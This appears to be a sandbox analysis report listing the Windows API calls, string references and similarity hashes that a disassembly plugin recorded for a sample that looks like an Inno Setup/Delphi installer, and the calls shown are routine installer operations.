                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00418F79
                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
                                                                                              • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
                                                                                              • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                              • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                              • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                              • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                              • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                              • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
                                                                                              • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                              • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                              • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                              • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                              • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                              • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
                                                                                            • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                            • API String ID: 316262546-2767913252
                                                                                            • Opcode ID: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                            • Instruction ID: d883a59e21ed3b4d0722d018b4a025de81f9e45e1fd093e44b5ebaba0e30331f
                                                                                            • Opcode Fuzzy Hash: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                            • Instruction Fuzzy Hash: AC115E706142419AD740FF76A94235A7BE1DF64308F40943FF448A7391DB3DA9448B5F
                                                                                            APIs
                                                                                            • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                            • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                            • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: LongWindow$Prop
                                                                                            • String ID:
                                                                                            • API String ID: 3887896539-0
                                                                                            • Opcode ID: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                            • Instruction ID: 06abc153636d574f2b9d5b42ed2ef1d3d1989bf2b09c04f5b7aa0ee96fd2bcf7
                                                                                            • Opcode Fuzzy Hash: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                            • Instruction Fuzzy Hash: 1011C975100244BFEF00DF9DDC84EDA37E8EB19364F144666B958DB2A2D738DD908B68
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
                                                                                            Strings
                                                                                            • WININIT.INI, xrefs: 004557E4
                                                                                            • PendingFileRenameOperations2, xrefs: 00455784
                                                                                            • PendingFileRenameOperations, xrefs: 00455754
                                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                            • API String ID: 47109696-2199428270
                                                                                            • Opcode ID: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                            • Instruction ID: 0fa1da25f67206326559771d92c7e47b52ca8d856d575cc5f046ac455f5bab2a
                                                                                            • Opcode Fuzzy Hash: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                            • Instruction Fuzzy Hash: FF51A974E006089FDB10EF61DC51AEEB7B9EF44305F50857BEC04A7292DB78AE49CA58
                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC27
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC30
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                                            • API String ID: 1375471231-2952887711
                                                                                            • Opcode ID: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                            • Instruction ID: e6577b7b61f0e0a35e690824fc442bae28cfcbc8f9cba78cd8161ab2dbd6b5d1
                                                                                            • Opcode Fuzzy Hash: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                            • Instruction Fuzzy Hash: E6412834A001099BDB11EFA5D882ADEB7B5EF45309F50843BE81577392DA38AE05CF68
                                                                                            APIs
                                                                                            • EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                            • GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                            • SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$EnumLongWindows
                                                                                            • String ID: \AB
                                                                                            • API String ID: 4191631535-3948367934
                                                                                            • Opcode ID: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                            • Instruction ID: 3ad81c14f5822e14e615a382c86082b2427cd388a5bf15486a3129e996868218
                                                                                            • Opcode Fuzzy Hash: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                            • Instruction Fuzzy Hash: D6115E70700610ABDB109F28E885F5677E8EB08715F10026AF994AB2E3C378ED41CB59
                                                                                            APIs
                                                                                            • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0217C140,00003EBC,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                            • String ID: hX
                                                                                            • API String ID: 730355536-463809249
                                                                                            • Opcode ID: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                            • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                            • Opcode Fuzzy Hash: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                            • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                            APIs
                                                                                            • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,0049785D), ref: 0042DE6B
                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressDeleteHandleModuleProc
                                                                                            • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                            • API String ID: 588496660-1846899949
                                                                                            • Opcode ID: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                            • Instruction ID: e7246de0df94fba710dd2820c0ca51643d5dd29c3ac0bea476bad59fd0e01b91
                                                                                            • Opcode Fuzzy Hash: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                            • Instruction Fuzzy Hash: 73E06DF1B41B30AAD72022657C8ABA33729DB75365F658437F105AD19183FC2C50CE9D
                                                                                            Strings
                                                                                            • PrepareToInstall failed: %s, xrefs: 0046BE6E
                                                                                            • Need to restart Windows? %s, xrefs: 0046BE95
                                                                                            • NextButtonClick, xrefs: 0046BC4C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
                                                                                            • API String ID: 0-2329492092
                                                                                            • Opcode ID: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                            • Instruction ID: 9de4db1b3e70fdebeced0fe060001c857bcfdee1b2562a0b259a97201065334e
                                                                                            • Opcode Fuzzy Hash: bdd1d04c3163942a70fe70ce9c3da0cdba0d450c43b562cfb8d9ec13df8274e7
                                                                                            • Instruction Fuzzy Hash: 46D12F34A00108DFCB14EB99D985AED77F5EF49304F5440BAE404EB362D778AE85CB9A
                                                                                            APIs
                                                                                            • SetActiveWindow.USER32(?,?,00000000,004833D5), ref: 004831A8
                                                                                            • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00483246
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ActiveChangeNotifyWindow
                                                                                            • String ID: $Need to restart Windows? %s
                                                                                            • API String ID: 1160245247-4200181552
                                                                                            • Opcode ID: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                            • Instruction ID: 855c298393525188f16043e43c8caa20abfdb27870bda8f6eb76b0fac02994d3
                                                                                            • Opcode Fuzzy Hash: 00647651f2966e2d6c0ac7b0a33bca8c0b176202d01056079f53a530b7b0addf
                                                                                            • Instruction Fuzzy Hash: 7E918F34A042449FDB10EF69D8C6BAD77E0AF55708F5484BBE8009B362DB78AE05CB5D
                                                                                            APIs
                                                                                              • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                            • GetLastError.KERNEL32(00000000,0046FCD9,?,?,0049C1E0,00000000), ref: 0046FBB6
                                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FC30
                                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FC55
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                                            • String ID: Creating directory: %s
                                                                                            • API String ID: 2451617938-483064649
                                                                                            • Opcode ID: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                            • Instruction ID: a145aa70eb484b5d007d33f2831cd5d1f219efd535f83afbcf26a903565c5eea
                                                                                            • Opcode Fuzzy Hash: 1aeec9fc70de36e1ff09abf6a814cf31666cc4aa73152690207cd024c9806782
                                                                                            • Instruction Fuzzy Hash: 7D512F74E00248ABDB01DBA5D982ADEBBF4AF49304F50847AEC50B7382D7795E08CB59
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressByteCharMultiProcWide
                                                                                            • String ID: SfcIsFileProtected$sfc.dll
                                                                                            • API String ID: 2508298434-591603554
                                                                                            • Opcode ID: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                            • Instruction ID: 709c5f55a6f5f8285c9c61fd8393730e8027effee09c5548c71846991cac34f0
                                                                                            • Opcode Fuzzy Hash: bb559eb6b427547f50ac361efa45694dce53a5facbc0d321e4ca2111cb35c873
                                                                                            • Instruction Fuzzy Hash: E8419671A04318DBEB20EF59DC85B9DB7B8AB4430DF5041B7A908A7293D7785F88CA1C
                                                                                            APIs
                                                                                            • 752A1520.VERSION(00000000,?,?,?,00497900), ref: 00452530
                                                                                            • 752A1500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 0045255D
                                                                                            • 752A1540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 00452577
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: A1500A1520A1540
                                                                                            • String ID: %E
                                                                                            • API String ID: 2563864905-175436132
                                                                                            • Opcode ID: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                            • Instruction ID: f5dca5bfdad9659449235e2d7a4f424f1fde127461be4d93bb02e754cc996b3f
                                                                                            • Opcode Fuzzy Hash: f18440ec30d6a8502c14f0dca7f1c7caee1af709ad5b943411f89d38bbe9f821
                                                                                            • Instruction Fuzzy Hash: D2218331A00608BFDB01DAA989519AFB7FCEB4A300F554477F800E7242E6B9AE04C765
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0044B401
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0044B424
                                                                                            • ReleaseDC.USER32(00000000,?), ref: 0044B457
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ObjectReleaseSelect
                                                                                            • String ID: %H
                                                                                            • API String ID: 1831053106-1959103961
                                                                                            • Opcode ID: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                            • Instruction ID: 242bcfed98594cbdcf51f2854abe94a1ec69c13560e3a72339b9f4254961cc58
                                                                                            • Opcode Fuzzy Hash: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                            • Instruction Fuzzy Hash: 62216570A04248AFEB15DFA6C841B9F7BB9DB49304F11806AF904A7682D778D940CB59
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
                                                                                            • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
                                                                                            • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText$ByteCharMultiWide
                                                                                            • String ID: %H
                                                                                            • API String ID: 65125430-1959103961
                                                                                            • Opcode ID: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                            • Instruction ID: fec6fabf6d030a51aab30bc406273ff78954f96defe81b00f374268ef7e1f253
                                                                                            • Opcode Fuzzy Hash: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                            • Instruction Fuzzy Hash: 2A11CBB27046047FEB00DB6A9C91D6F77ECDB49750F10817BF504D72D0D6399E018669
                                                                                            APIs
                                                                                            • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                              • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                              • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                            • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                            Strings
                                                                                            Memory Dump Source
